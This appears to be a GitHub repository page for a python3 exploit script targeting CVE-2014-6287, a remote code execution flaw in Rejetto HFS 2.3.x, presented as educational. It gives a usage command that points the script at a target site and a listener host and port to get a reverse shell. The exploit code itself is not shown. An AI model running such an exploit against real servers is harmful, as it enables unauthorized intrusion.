Skip to content

hadrian3689/rejetto_hfs_rce

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

CVE-2014-6287 Rejetto HFS 2.3.x

A python3 script for the CVE-2014-6287 Rejetto HFS RCE exploit in order get a reverse shell.

Getting Started

Executing program

  • With python3
python3 hfs.py -t http://hfssite.com -lhost 127.0.0.1 -lport 9001

Help

For help menu:

python3 hfs.py -h

Disclaimer

All the code provided on this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository is solely your responsibility. The misuse of the code in this repository can result in criminal charges brought against the persons in question. Author will not be held responsible in the event any criminal charges be brought against any individuals misusing the code in this repository to break the law.

About

CVE-2014-6287 Rejetto HFS 2.3

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages